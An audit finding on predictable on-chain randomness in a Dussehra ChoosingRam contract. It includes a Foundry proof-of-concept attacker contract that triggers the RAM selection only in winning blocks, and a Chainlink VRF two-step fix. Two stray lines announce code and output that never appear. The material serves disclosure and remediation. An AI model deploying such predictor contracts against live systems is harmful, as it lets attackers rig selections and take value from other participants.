The selectRamIfNotSelected() function in the ChoosingRam contract derives its "random" RAM selection from block.timestamp and block.prevrandao. Neither value is secret: both are known to every participant before the transaction executes, any contract in the same block can compute the identical value, and the block proposer has some influence over the timestamp. The situation is worse on chains where block.prevrandao does not vary at all; Arbitrum and zkSync Era document that it returns a constant, which leaves block.timestamp as the only input and makes the result trivially computable. This predictability compromises the integrity of the selection process.

Because the outcome can be computed ahead of time, an attacker can check who would be selected and only trigger the selection (or time their transaction) in a block where the result favours them, breaking the randomness logic and manipulating the outcome. This leads to unfair advantages and exploitation within the system.
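The following Foundry test is an added illustration of the attack path described above; it is not the finding's own PoC and not the Dussehra code. RamSelectorModel is a hypothetical stand-in that reproduces only the timestamp/prevrandao pattern, SelectionPredictor is the attacker contract, and the candidate addresses are constructed with makeAddr. The second test pins prevrandao to a constant to model the L2 case.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Hypothetical minimal model of the pattern the finding describes: the winner
// index is derived from block.timestamp and block.prevrandao. This is NOT the
// Dussehra contract, only a stand-in that reproduces the weakness.
contract RamSelectorModel {
    address[] public candidates;
    address public selectedRam;

    constructor(address[] memory _candidates) {
        candidates = _candidates;
    }

    function candidateCount() external view returns (uint256) {
        return candidates.length;
    }

    function selectRamIfNotSelected() external {
        require(selectedRam == address(0), "already selected");
        uint256 random = uint256(
            keccak256(abi.encodePacked(block.timestamp, block.prevrandao))
        ) % candidates.length;
        selectedRam = candidates[random];
    }
}

// Attacker: every input to the "random" number is visible to any contract in the
// same block, so the outcome can be computed before deciding whether to trigger it.
contract SelectionPredictor {
    RamSelectorModel public immutable target;
    address public immutable wanted;

    constructor(RamSelectorModel _target, address _wanted) {
        target = _target;
        wanted = _wanted;
    }

    function predictedWinner() public view returns (address) {
        uint256 random = uint256(
            keccak256(abi.encodePacked(block.timestamp, block.prevrandao))
        ) % target.candidateCount();
        return target.candidates(random);
    }

    // Trigger the selection only in a block where the attacker's address wins;
    // otherwise revert and try again in a later block.
    function selectOnlyIfIWin() external {
        require(predictedWinner() == wanted, "not a winning block, retry");
        target.selectRamIfNotSelected();
    }
}

contract PredictableRamTest is Test {
    RamSelectorModel selector;
    SelectionPredictor attacker;
    address[] entrants; // constructed sample candidates

    function setUp() public {
        entrants.push(makeAddr("alice"));
        entrants.push(makeAddr("attacker"));
        entrants.push(makeAddr("carol"));
        selector = new RamSelectorModel(entrants);
        attacker = new SelectionPredictor(selector, entrants[1]);
    }

    // The attacker's prediction always matches the on-chain pick.
    function test_predictionMatchesSelection() public {
        vm.prevrandao(bytes32(uint256(0xdeadbeef)));
        vm.warp(1_700_000_000);
        address predicted = attacker.predictedWinner();
        selector.selectRamIfNotSelected();
        assertEq(selector.selectedRam(), predicted);
    }

    // Chain with a constant prevrandao (the L2 case): only the timestamp varies,
    // so the attacker simply waits for a block whose timestamp makes it win.
    function test_attackerWaitsForFavourableBlock() public {
        vm.prevrandao(bytes32(uint256(1)));
        uint256 start = block.timestamp;
        for (uint256 i = 0; i < 100; i++) {
            vm.warp(start + i);
            if (attacker.predictedWinner() == entrants[1]) break;
        }
        attacker.selectOnlyIfIWin();
        assertEq(selector.selectedRam(), entrants[1]);
    }
}
```

Run with forge test -vv. The point of selectOnlyIfIWin() is that a losing block costs the attacker only a reverted call; the selection is never triggered until a block in which the attacker wins, so "random" selection degrades to "attacker's choice of block".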
Run the following code in Dussehra.t.sol:

Output:
To ensure the randomness cannot be predicted or manipulated, use a Verifiable Random Function (VRF) service. A VRF returns a random value together with a proof that it was generated honestly, so the value cannot be predicted before the request nor altered by the caller, the validator, or the oracle. Some recommended services include:
Chainlink VRF (Recommended): Provides cryptographically secure, on-chain verifiable randomness.
Gelato VRF: Offers automation together with verifiable randomness.
Pyth Entropy: Delivers reliable, tamper-resistant random numbers.
With any of these, selectRamIfNotSelected() must be split into two steps: a request that records the pending request ID, and a fulfilment callback, called only by the oracle, in which the RAM is actually chosen. The contract should refuse a second request while one is pending (so nobody can re-roll) and the candidate list should be frozen before the request is made, otherwise entries added afterwards change which address the random word maps to. Integrating a VRF in this way removes the predictability of the current implementation.
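As an added example of the request/fulfil structure recommended above (not the project's code), the contract below uses the Chainlink VRF v2.5 consumer interface. VrfRamSelector, requestRamSelection, candidates and selectedRam are this example's own names; the import paths are those published in the @chainlink/contracts package and should be checked against the version you install. Key hash, subscription ID and coordinator address are deployment-time parameters the deployer supplies.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Chainlink VRF v2.5 consumer base and request-encoding library.
// Import paths as published in @chainlink/contracts (assumed; verify locally).
import {VRFConsumerBaseV2Plus} from "@chainlink/contracts/src/v0.8/vrf/dev/VRFConsumerBaseV2Plus.sol";
import {VRFV2PlusClient} from "@chainlink/contracts/src/v0.8/vrf/dev/libraries/VRFV2PlusClient.sol";

// Hypothetical two-step selector: step 1 requests randomness, step 2 picks the
// RAM inside the oracle callback. Names are this example's own.
contract VrfRamSelector is VRFConsumerBaseV2Plus {
    address[] public candidates;
    address public selectedRam;
    uint256 public pendingRequestId;

    bytes32 private immutable i_keyHash;
    uint256 private immutable i_subscriptionId;
    uint32 private constant CALLBACK_GAS_LIMIT = 200_000;
    uint16 private constant REQUEST_CONFIRMATIONS = 3;
    uint32 private constant NUM_WORDS = 1;

    event RamSelectionRequested(uint256 indexed requestId);
    event RamSelected(address indexed ram, uint256 indexed requestId);

    error AlreadySelected();
    error RequestPending();
    error NoCandidates();
    error UnexpectedRequest(uint256 requestId);

    constructor(
        address vrfCoordinator,
        bytes32 keyHash,
        uint256 subscriptionId,
        address[] memory _candidates
    ) VRFConsumerBaseV2Plus(vrfCoordinator) {
        i_keyHash = keyHash;
        i_subscriptionId = subscriptionId;
        candidates = _candidates; // frozen from here on: no add/remove after deploy
    }

    // Step 1: anyone may trigger the request, but only one may be in flight and
    // none after a RAM is chosen, so a caller cannot "re-roll" the outcome.
    function requestRamSelection() external returns (uint256 requestId) {
        if (selectedRam != address(0)) revert AlreadySelected();
        if (pendingRequestId != 0) revert RequestPending();
        if (candidates.length == 0) revert NoCandidates();

        requestId = s_vrfCoordinator.requestRandomWords(
            VRFV2PlusClient.RandomWordsRequest({
                keyHash: i_keyHash,
                subId: i_subscriptionId,
                requestConfirmations: REQUEST_CONFIRMATIONS,
                callbackGasLimit: CALLBACK_GAS_LIMIT,
                numWords: NUM_WORDS,
                extraArgs: VRFV2PlusClient._argsToBytes(
                    VRFV2PlusClient.ExtraArgsV1({nativePayment: false})
                )
            })
        );
        pendingRequestId = requestId;
        emit RamSelectionRequested(requestId);
    }

    // Step 2: the coordinator (and only the coordinator, enforced by the base
    // contract's rawFulfillRandomWords) delivers the verified random word.
    // The selection happens here, so neither block.timestamp nor
    // block.prevrandao nor the requester's timing can influence it.
    function fulfillRandomWords(
        uint256 requestId,
        uint256[] calldata randomWords
    ) internal override {
        if (requestId != pendingRequestId) revert UnexpectedRequest(requestId);
        if (selectedRam != address(0)) revert AlreadySelected();

        // Modulo bias is negligible for a 256-bit word against a small list.
        uint256 index = randomWords[0] % candidates.length;
        selectedRam = candidates[index];
        pendingRequestId = 0;
        emit RamSelected(selectedRam, requestId);
    }
}
```

The contract must be added as a consumer on a funded VRF subscription before requestRamSelection() is called, and CALLBACK_GAS_LIMIT must cover the storage writes and event in fulfillRandomWords(), since an out-of-gas callback is not retried by the coordinator. Gelato VRF and Pyth Entropy follow the same request/callback shape with different base contracts.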